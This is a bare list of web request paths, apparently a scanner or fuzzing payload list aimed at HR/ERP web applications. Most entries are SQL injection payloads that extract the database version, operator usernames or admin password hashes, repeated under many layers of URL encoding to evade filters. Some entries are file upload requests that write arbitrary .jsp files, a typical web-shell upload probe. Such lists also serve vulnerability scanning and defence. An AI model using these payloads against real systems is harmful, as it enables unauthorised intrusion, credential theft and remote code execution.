FileReceiveServlet
FileUpload?actionID=update&fileName=kuhmlhgc.jsp
FileUpload?actionID=update&fileName=zqqtrjfr.jsp
GetProductVersion
PayBill%25252525252525253F_rnd&caculate
PayBill%252525252525253F_rnd&caculate
PayBill%2525252525253F_rnd&caculate
PayBill%25252525253F_rnd&caculate
PayBill%252525253F_rnd&caculate
PayBill%2525253F_rnd&caculate
PayBill%25253F_rnd&caculate
PayBill%253F_rnd&caculate
PayBill%3F_rnd&caculate
PayBill?_rnd&caculate
UploadServlet
codesettree%25252525252525252525253Fflag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
codesettree%252525252525252525253Fflag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
codesettree%2525252525252525253Fflag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
codesettree%25252525252525253Fcategories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d&codesetid=1&flag=c&parentid=-1&status=1
codesettree%25252525252525253Fflag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
codesettree%252525252525253Fcategories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d&codesetid=1&flag=c&parentid=-1&status=1
codesettree%252525252525253Fflag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
codesettree%2525252525253Fcategories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d&codesetid=1&flag=c&parentid=-1&status=1
codesettree%2525252525253Fflag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
codesettree%25252525253Fcategories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d&codesetid=1&flag=c&parentid=-1&status=1
codesettree%25252525253Fflag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
codesettree%252525253Fcategories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d&codesetid=1&flag=c&parentid=-1&status=1
codesettree%252525253Fflag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
codesettree%2525253Fcategories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d&codesetid=1&flag=c&parentid=-1&status=1
codesettree%2525253Fflag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
codesettree%25253Fcategories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d&codesetid=1&flag=c&parentid=-1&status=1
codesettree%25253Fflag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
codesettree%253Fcategories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d&codesetid=1&flag=c&parentid=-1&status=1
codesettree%253Fflag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
codesettree%3Fcategories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d&codesetid=1&flag=c&parentid=-1&status=1
codesettree%3Fflag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
codesettree?categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d&codesetid=1&flag=c&parentid=-1&status=1
codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d
fileupload/
imagefield?key=readimage&sImgname=password&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+&sTablename=bbs_admin
uploadAttachmentServlet